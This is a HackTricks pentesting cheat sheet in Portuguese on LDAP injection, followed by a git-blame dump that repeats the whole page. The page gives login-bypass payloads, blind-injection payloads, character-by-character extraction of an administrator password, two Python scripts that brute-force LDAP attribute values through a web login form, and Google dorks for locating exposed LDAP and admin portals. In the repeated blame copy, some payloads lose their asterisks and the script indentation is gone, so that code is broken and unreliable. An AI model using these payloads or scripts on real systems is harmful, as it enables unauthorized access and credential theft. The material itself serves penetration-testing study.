hacktricks/pentesting-web/ldap-injection.md

# Injeção LDAP

## Injeção LDAP

<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e para o** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>

<img src="../.gitbook/assets/i3.png" alt="" data-size="original">\
**Dica de bug bounty**: **inscreva-se** no **Intigriti**, uma plataforma premium de **bug bounty criada por hackers, para hackers**! Junte-se a nós em [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) hoje e comece a ganhar recompensas de até **$100.000**!

{% embed url="https://go.intigriti.com/hacktricks" %}

### **LDAP**

**Se você quiser saber o que é LDAP, acesse a seguinte página:**

{% content-ref url="../network-services-pentesting/pentesting-ldap.md" %}
[pentesting-ldap.md](../network-services-pentesting/pentesting-ldap.md)
{% endcontent-ref %}

**Injeção LDAP** é um ataque usado para **explorar** aplicativos baseados na web que constroem **declarações LDAP** com base na **entrada do usuário**. Quando um aplicativo **falha** em **sanitizar** adequadamente a entrada do usuário, é possível modificar as declarações LDAP usando um proxy local.

{% file src="../.gitbook/assets/en-blackhat-europe-2008-ldap-injection-blind-ldap-injection.pdf" %}

**Filtro** = ( filtercomp )\
**Filtercomp** = and / or / not / item\
**And** = & filterlist\
**Or** = |filterlist\
**Not** = ! filter\
**Filterlist** = 1\*filter\
**Item**= simple / present / substring\
**Simple** = attr filtertype assertionvalue\
**Filtertype** = _'=' / '\~=' / '>=' / '<='_\
**Present** = attr = \*\
**Substring** = attr ”=” \[initial] \* \[final]\
**Initial** = assertionvalue\
**Final** = assertionvalue\
**(&)** = Absolute TRUE\
**(|)** = Absolute FALSE

Por exemplo:\
`(&(!(objectClass=Impresoras))(uid=s*))`\
`(&(objectClass=user)(uid=*))`

Você pode acessar o banco de dados, e isso pode conter informações de muitos tipos diferentes.

**OpenLDAP**: Se 2 filtros chegarem, apenas o primeiro será executado.\
**ADAM ou Microsoft LDS**: Com 2 filtros, eles lançam um erro.\
**SunOne Directory Server 5.0**: Executa ambos os filtros.

**É muito importante enviar o filtro com a sintaxe correta ou um erro será lançado. É melhor enviar apenas 1 filtro.**

O filtro deve começar com: `&` ou `|`\
Exemplo: `(&(directory=val1)(folder=public))`

`(&(objectClass=VALUE1)(type=Epson*))`\
`VALUE1 = *)(ObjectClass=*))(&(objectClass=void`

Então: `(&(objectClass=`**`*)(ObjectClass=*))`** será o primeiro filtro (o que será executado).

### Bypass de Login

LDAP suporta vários formatos para armazenar a senha: clara, md5, smd5, sh1, sha, crypt. Portanto, pode ser que, independentemente do que você insira dentro da senha, ela seja hashada.
```bash
user=*
password=*
--> (&(user=*)(password=*))
# The asterisks are great in LDAPi
```

```bash
user=*)(&
password=*)(&
--> (&(user=*)(&)(password=*)(&))
```

```bash
user=*)(|(&
pass=pwd)
--> (&(user=*)(|(&)(pass=pwd))
```

```bash
user=*)(|(password=*
password=test)
--> (&(user=*)(|(password=*)(password=test))
```

```bash
user=*))%00
pass=any
--> (&(user=*))%00 --> Nothing more is executed
```

```bash
user=admin)(&)
password=pwd
--> (&(user=admin)(&))(password=pwd) #Can through an error
```

```bash
username = admin)(!(&(|
pass = any))
--> (&(uid= admin)(!(& (|) (webpassword=any)))) —> As (|) is FALSE then the user is admin and the password check is True.
```

```bash
username=*
password=*)(&
--> (&(user=*)(password=*)(&))
```

```bash
username=admin))(|(|
password=any
--> (&(uid=admin)) (| (|) (webpassword=any))
```
#### Listas

* [LDAP\_FUZZ](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20Injection/Intruder/LDAP\_FUZZ.txt)
* [Atributos LDAP](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20Injection/Intruder/LDAP\_attributes.txt)
* [Atributos PosixAccount LDAP](https://tldp.org/HOWTO/archived/LDAP-Implementation-HOWTO/schemas.html)

### Injeção LDAP Cega

Você pode forçar respostas Falsas ou Verdadeiras para verificar se algum dado é retornado e confirmar uma possível Injeção LDAP Cega:
```bash
#This will result on True, so some information will be shown
Payload: *)(objectClass=*))(&objectClass=void
Final query: (&(objectClass= *)(objectClass=*))(&objectClass=void )(type=Pepi*))
```

```bash
#This will result on True, so no information will be returned or shown
Payload: void)(objectClass=void))(&objectClass=void
Final query: (&(objectClass= void)(objectClass=void))(&objectClass=void )(type=Pepi*))
```
#### Despejar dados

Você pode iterar sobre as letras ascii, dígitos e símbolos:
```bash
(&(sn=administrator)(password=*))    : OK
(&(sn=administrator)(password=A*))   : KO
(&(sn=administrator)(password=B*))   : KO
...
(&(sn=administrator)(password=M*))   : OK
(&(sn=administrator)(password=MA*))  : KO
(&(sn=administrator)(password=MB*))  : KO
...
```
### Scripts

#### **Descobrir campos LDAP válidos**

Os objetos LDAP **contêm por padrão vários atributos** que podem ser usados para **salvar informações**. Você pode tentar **forçar a entrada em todos eles para extrair essas informações**. Você pode encontrar uma lista de [**atributos LDAP padrão aqui**](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP%20Injection/Intruder/LDAP\_attributes.txt).
```python
#!/usr/bin/python3
import requests
import string
from time import sleep
import sys

proxy = { "http": "localhost:8080" }
url = "http://10.10.10.10/login.php"
alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"

attributes = ["c", "cn", "co", "commonName", "dc", "facsimileTelephoneNumber", "givenName", "gn", "homePhone", "id", "jpegPhoto", "l", "mail", "mobile", "name", "o", "objectClass", "ou", "owner", "pager", "password", "sn", "st", "surname", "uid", "username", "userPassword",]

for attribute in attributes: #Extract all attributes
    value = ""
    finish = False
    while not finish:
        for char in alphabet: #In each possition test each possible printable char
            query = f"*)({attribute}={value}{char}*"
            data = {'login':query, 'password':'bla'}
            r = requests.post(url, data=data, proxies=proxy)
            sys.stdout.write(f"\r{attribute}: {value}{char}")
            #sleep(0.5) #Avoid brute-force bans
            if "Cannot login" in r.text:
                value += str(char)
                break

            if char == alphabet[-1]: #If last of all the chars, then, no more chars in the value
                finish = True
                print()
```
#### **Injeção LDAP Blind Especial (sem "\*")**
```python
#!/usr/bin/python3

import requests, string
alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"

flag = ""
for i in range(50):
    print("[i] Looking for number " + str(i))
    for char in alphabet:
        r = requests.get("http://ctf.web??action=dir&search=admin*)(password=" + flag + char)
        if ("TRUE CONDITION" in r.text):
            flag += char
            print("[+] Flag: " + flag)
            break
```
### Google Dorks

Dorks são consultas de pesquisa avançadas que podem ser usadas para encontrar informações sensíveis e vulnerabilidades em sites e aplicativos da web. O Google é uma das ferramentas mais populares para encontrar dorks, e existem muitos dorks específicos para encontrar vulnerabilidades de injeção LDAP.

Aqui estão alguns exemplos de dorks de injeção LDAP:

- `inurl:/ldapadmin.php`
- `intitle:"Novell Web Services" intext:"Select a user to impersonate" -inurl:"doc/"`
- `intitle:"Novell Web Services" "GroupWise" -inurl:"doc/"`
- `intitle:"Novell Web Services" "NetWare" -inurl:"doc/"`
- `intitle:"Novell Web Services" "Groupwise WebAccess" -inurl:"doc/"`
- `intitle:"Novell NetWare" "GroupWise" -inurl:"doc/"`
- `intitle:"Novell NetWare" "GroupWise WebAccess" -inurl:"doc/"`
- `intitle:"Novell NetWare" intext:"netware management portal version" -inurl:"doc/"`
- `intitle:"Novell NetWare" intext:"netware management portal version" -inurl:"oneNet"`
- `intitle:"Login - Ipswitch WhatsUp Gold" intext:"Ipswitch WhatsUp Gold Log In"`
- `intitle:"HP Integrated Lights-Out 2 Login"`
- `intitle:"HP Integrated Lights-Out 2 Login" "User Name"`
- `intitle:"HP Integrated Lights-Out 2 Login" "User Name" "Password"`
- `intitle:"Login - Ipswitch WhatsUp Gold" intext:"Ipswitch WhatsUp Gold Log In"`

Esses dorks podem ser usados para encontrar páginas de login LDAP e outras páginas relacionadas a LDAP que podem ser vulneráveis à injeção LDAP.
```bash
intitle:"phpLDAPadmin" inurl:cmd.php
```
### Mais payloads

{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection" %}

<img src="../.gitbook/assets/i3.png" alt="" data-size="original">\
**Dica de bug bounty**: **inscreva-se** na **Intigriti**, uma plataforma premium de **bug bounty criada por hackers, para hackers**! Junte-se a nós em [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) hoje mesmo e comece a ganhar recompensas de até **$100.000**!

{% embed url="https://go.intigriti.com/hacktricks" %}

<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e para o** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`# Injeção LDAP`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`## Injeção LDAP`
GitBook: [#3183] No subject 2022-05-07 13:38:40 +00:00
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00			`<details>`

update twitter 2023-04-25 18:35:28 +00:00			`<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`* Você trabalha em uma empresa de segurança cibernética? Você quer ver sua empresa anunciada no HackTricks? ou você quer ter acesso à última versão do PEASS ou baixar o HackTricks em PDF? Verifique os [PLANOS DE ASSINATURA](https://github.com/sponsors/carlospolop)!`
			`* Descubra [A Família PEASS](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [NFTs](https://opensea.io/collection/the-peass-family)`
			`* Adquira o [swag oficial do PEASS & HackTricks](https://peass.creator-spring.com)`
			`* Junte-se ao [💬](https://emojipedia.org/speech-balloon/) [grupo do Discord](https://discord.gg/hRep4RUj7f) ou ao [grupo do telegram](https://t.me/peass) ou siga-me no Twitter [🐦](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[@carlospolopm](https://twitter.com/hacktricks_live).`
			`* Compartilhe suas técnicas de hacking enviando PRs para o [repositório hacktricks](https://github.com/carlospolop/hacktricks) e para o [repositório hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud).`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`

change logo 2022-07-21 20:26:09 +00:00			`<img src="../.gitbook/assets/i3.png" alt="" data-size="original">\`
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`Dica de bug bounty: inscreva-se no Intigriti, uma plataforma premium de bug bounty criada por hackers, para hackers! Junte-se a nós em [https://go.intigriti.com/hacktricks](https://go.intigriti.com/hacktricks) hoje e comece a ganhar recompensas de até $100.000!`
GitBook: [#3157] No subject 2022-04-30 20:31:18 +00:00
			`{% embed url="https://go.intigriti.com/hacktricks" %}`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
GitBook: [#3183] No subject 2022-05-07 13:38:40 +00:00			`### LDAP`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`Se você quiser saber o que é LDAP, acesse a seguinte página:`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
GitBook: [#3160] No subject 2022-05-01 13:25:53 +00:00			`{% content-ref url="../network-services-pentesting/pentesting-ldap.md" %}`
			`[pentesting-ldap.md](../network-services-pentesting/pentesting-ldap.md)`
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			`{% endcontent-ref %}`
GitBook: [master] 3 pages and one asset modified 2021-06-08 20:38:29 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`Injeção LDAP é um ataque usado para explorar aplicativos baseados na web que constroem declarações LDAP com base na entrada do usuário. Quando um aplicativo falha em sanitizar adequadamente a entrada do usuário, é possível modificar as declarações LDAP usando um proxy local.`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
GITBOOK-3777: No subject 2023-02-14 11:55:05 +00:00			`{% file src="../.gitbook/assets/en-blackhat-europe-2008-ldap-injection-blind-ldap-injection.pdf" %}`
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`Filtro = ( filtercomp )\`
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			`Filtercomp = and / or / not / item\`
			`And = & filterlist\`
			`Or = \|filterlist\`
			`Not = ! filter\`
			`Filterlist = 1\*filter\`
			`Item= simple / present / substring\`
			`Simple = attr filtertype assertionvalue\`
			`Filtertype = _'=' / '\~=' / '>=' / '<='_\`
			`Present = attr = \*\`
			`Substring = attr ”=” \[initial] \* \[final]\`
			`Initial = assertionvalue\`
			`Final = assertionvalue\`
			`(&) = Absolute TRUE\`
			`(\|) = Absolute FALSE`

Translated to Portuguese 2023-06-06 18:56:34 +00:00			`Por exemplo:\`
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			`(&(!(objectClass=Impresoras))(uid=s*))`\
			`(&(objectClass=user)(uid=*))`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`Você pode acessar o banco de dados, e isso pode conter informações de muitos tipos diferentes.`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`OpenLDAP: Se 2 filtros chegarem, apenas o primeiro será executado.\`
			`ADAM ou Microsoft LDS: Com 2 filtros, eles lançam um erro.\`
			`SunOne Directory Server 5.0: Executa ambos os filtros.`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`É muito importante enviar o filtro com a sintaxe correta ou um erro será lançado. É melhor enviar apenas 1 filtro.`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			O filtro deve começar com: `&` ou `\|`\
			Exemplo: `(&(directory=val1)(folder=public))`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			`(&(objectClass=VALUE1)(type=Epson*))`\
			`VALUE1 = )(ObjectClass=))(&(objectClass=void`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			Então: `(&(objectClass=`*`)(ObjectClass=))`* será o primeiro filtro (o que será executado).
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`### Bypass de Login`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`LDAP suporta vários formatos para armazenar a senha: clara, md5, smd5, sh1, sha, crypt. Portanto, pode ser que, independentemente do que você insira dentro da senha, ela seja hashada.`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```bash
			`user=*`
			`password=*`
			`--> (&(user=)(password=))`
			`# The asterisks are great in LDAPi`
			```

			```bash
			`user=*)(&`
			`password=*)(&`
			`--> (&(user=)(&)(password=)(&))`
			```

			```bash
			`user=*)(\|(&`
			`pass=pwd)`
			`--> (&(user=*)(\|(&)(pass=pwd))`
			```

			```bash
			`user=)(\|(password=`
			`password=test)`
			`--> (&(user=)(\|(password=)(password=test))`
			```

			```bash
			`user=*))%00`
			`pass=any`
			`--> (&(user=*))%00 --> Nothing more is executed`
			```

			```bash
			`user=admin)(&)`
			`password=pwd`
			`--> (&(user=admin)(&))(password=pwd) #Can through an error`
			```

			```bash
			`username = admin)(!(&(\|`
			`pass = any))`
GitBook: [master] 2 pages and 4 assets modified 2021-06-08 21:58:39 +00:00			`--> (&(uid= admin)(!(& (\|) (webpassword=any)))) —> As (\|) is FALSE then the user is admin and the password check is True.`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```

			```bash
			`username=*`
			`password=*)(&`
			`--> (&(user=)(password=)(&))`
			```

			```bash
			`username=admin))(\|(\|`
			`password=any`
			`--> (&(uid=admin)) (\| (\|) (webpassword=any))`
			```
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`#### Listas`
GitBook: [master] 2 pages and 4 assets modified 2021-06-08 21:58:39 +00:00
GitBook: [#3157] No subject 2022-04-30 20:31:18 +00:00			`* [LDAP\_FUZZ](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20Injection/Intruder/LDAP\_FUZZ.txt)`
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`* [Atributos LDAP](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20Injection/Intruder/LDAP\_attributes.txt)`
			`* [Atributos PosixAccount LDAP](https://tldp.org/HOWTO/archived/LDAP-Implementation-HOWTO/schemas.html)`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`### Injeção LDAP Cega`
GitBook: [master] 2 pages and 4 assets modified 2021-06-08 21:58:39 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`Você pode forçar respostas Falsas ou Verdadeiras para verificar se algum dado é retornado e confirmar uma possível Injeção LDAP Cega:`
GitBook: [master] 2 pages and 4 assets modified 2021-06-08 21:58:39 +00:00			```bash
			`#This will result on True, so some information will be shown`
			`Payload: )(objectClass=))(&objectClass=void`
			`Final query: (&(objectClass= )(objectClass=))(&objectClass=void )(type=Pepi*))`
			```

			```bash
			`#This will result on True, so no information will be returned or shown`
			`Payload: void)(objectClass=void))(&objectClass=void`
			`Final query: (&(objectClass= void)(objectClass=void))(&objectClass=void )(type=Pepi*))`
			```
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`#### Despejar dados`
GitBook: [master] 2 pages and 4 assets modified 2021-06-08 21:58:39 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`Você pode iterar sobre as letras ascii, dígitos e símbolos:`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```bash
			`(&(sn=administrator)(password=*)) : OK`
			`(&(sn=administrator)(password=A*)) : KO`
			`(&(sn=administrator)(password=B*)) : KO`
			`...`
			`(&(sn=administrator)(password=M*)) : OK`
			`(&(sn=administrator)(password=MA*)) : KO`
			`(&(sn=administrator)(password=MB*)) : KO`
			`...`
			```
GitBook: [#3183] No subject 2022-05-07 13:38:40 +00:00			`### Scripts`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`#### Descobrir campos LDAP válidos`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`Os objetos LDAP contêm por padrão vários atributos que podem ser usados para salvar informações. Você pode tentar forçar a entrada em todos eles para extrair essas informações. Você pode encontrar uma lista de [atributos LDAP padrão aqui](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP%20Injection/Intruder/LDAP\_attributes.txt).`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```python
			`#!/usr/bin/python3`
			`import requests`
			`import string`
			`from time import sleep`
			`import sys`

			`proxy = { "http": "localhost:8080" }`
			`url = "http://10.10.10.10/login.php"`
			`alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"`

			`attributes = ["c", "cn", "co", "commonName", "dc", "facsimileTelephoneNumber", "givenName", "gn", "homePhone", "id", "jpegPhoto", "l", "mail", "mobile", "name", "o", "objectClass", "ou", "owner", "pager", "password", "sn", "st", "surname", "uid", "username", "userPassword",]`

			`for attribute in attributes: #Extract all attributes`
			`value = ""`
			`finish = False`
			`while not finish:`
			`for char in alphabet: #In each possition test each possible printable char`
			`query = f")({attribute}={value}{char}"`
			`data = {'login':query, 'password':'bla'}`
			`r = requests.post(url, data=data, proxies=proxy)`
			`sys.stdout.write(f"\r{attribute}: {value}{char}")`
			`#sleep(0.5) #Avoid brute-force bans`
			`if "Cannot login" in r.text:`
			`value += str(char)`
			`break`
GitBook: [master] 8 pages and 14 assets modified 2021-05-29 20:00:49 +00:00
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`if char == alphabet[-1]: #If last of all the chars, then, no more chars in the value`
			`finish = True`
			`print()`
			```
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`#### *Injeção LDAP Blind Especial (sem "\")**`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```python
			`#!/usr/bin/python3`

			`import requests, string`
			`alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"`

			`flag = ""`
			`for i in range(50):`
			`print("[i] Looking for number " + str(i))`
			`for char in alphabet:`
			`r = requests.get("http://ctf.web??action=dir&search=admin*)(password=" + flag + char)`
			`if ("TRUE CONDITION" in r.text):`
			`flag += char`
			`print("[+] Flag: " + flag)`
			`break`
			```
GitBook: [#3183] No subject 2022-05-07 13:38:40 +00:00			`### Google Dorks`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`Dorks são consultas de pesquisa avançadas que podem ser usadas para encontrar informações sensíveis e vulnerabilidades em sites e aplicativos da web. O Google é uma das ferramentas mais populares para encontrar dorks, e existem muitos dorks específicos para encontrar vulnerabilidades de injeção LDAP.`

			`Aqui estão alguns exemplos de dorks de injeção LDAP:`

			- `inurl:/ldapadmin.php`
			- `intitle:"Novell Web Services" intext:"Select a user to impersonate" -inurl:"doc/"`
			- `intitle:"Novell Web Services" "GroupWise" -inurl:"doc/"`
			- `intitle:"Novell Web Services" "NetWare" -inurl:"doc/"`
			- `intitle:"Novell Web Services" "Groupwise WebAccess" -inurl:"doc/"`
			- `intitle:"Novell NetWare" "GroupWise" -inurl:"doc/"`
			- `intitle:"Novell NetWare" "GroupWise WebAccess" -inurl:"doc/"`
			- `intitle:"Novell NetWare" intext:"netware management portal version" -inurl:"doc/"`
			- `intitle:"Novell NetWare" intext:"netware management portal version" -inurl:"oneNet"`
			- `intitle:"Login - Ipswitch WhatsUp Gold" intext:"Ipswitch WhatsUp Gold Log In"`
			- `intitle:"HP Integrated Lights-Out 2 Login"`
			- `intitle:"HP Integrated Lights-Out 2 Login" "User Name"`
			- `intitle:"HP Integrated Lights-Out 2 Login" "User Name" "Password"`
			- `intitle:"Login - Ipswitch WhatsUp Gold" intext:"Ipswitch WhatsUp Gold Log In"`

			`Esses dorks podem ser usados para encontrar páginas de login LDAP e outras páginas relacionadas a LDAP que podem ser vulneráveis à injeção LDAP.`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```bash
			`intitle:"phpLDAPadmin" inurl:cmd.php`
			```
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`### Mais payloads`
GitBook: [master] 2 pages and 4 assets modified 2021-06-08 21:58:39 +00:00
GitBook: [#3193] No subject 2022-05-08 22:42:39 +00:00			`{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection" %}`

change logo 2022-07-21 20:26:09 +00:00			`<img src="../.gitbook/assets/i3.png" alt="" data-size="original">\`
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`Dica de bug bounty: inscreva-se na Intigriti, uma plataforma premium de bug bounty criada por hackers, para hackers! Junte-se a nós em [https://go.intigriti.com/hacktricks](https://go.intigriti.com/hacktricks) hoje mesmo e comece a ganhar recompensas de até $100.000!`
GitBook: [#3193] No subject 2022-05-08 22:42:39 +00:00
			`{% embed url="https://go.intigriti.com/hacktricks" %}`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`<details>`

update twitter 2023-04-25 18:35:28 +00:00			`<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`* Você trabalha em uma empresa de segurança cibernética? Você quer ver sua empresa anunciada no HackTricks? ou quer ter acesso à última versão do PEASS ou baixar o HackTricks em PDF? Confira os [PLANOS DE ASSINATURA](https://github.com/sponsors/carlospolop)!`
			`* Descubra [A Família PEASS](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [NFTs](https://opensea.io/collection/the-peass-family)`
			`* Adquira o [swag oficial do PEASS & HackTricks](https://peass.creator-spring.com)`
			`* Junte-se ao [💬](https://emojipedia.org/speech-balloon/) [grupo do Discord](https://discord.gg/hRep4RUj7f) ou ao [grupo do telegram](https://t.me/peass) ou siga-me no Twitter [🐦](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[@carlospolopm](https://twitter.com/hacktricks_live).`
			`* Compartilhe suas técnicas de hacking enviando PRs para o [repositório hacktricks](https://github.com/carlospolop/hacktricks) e para o [repositório hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud).`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`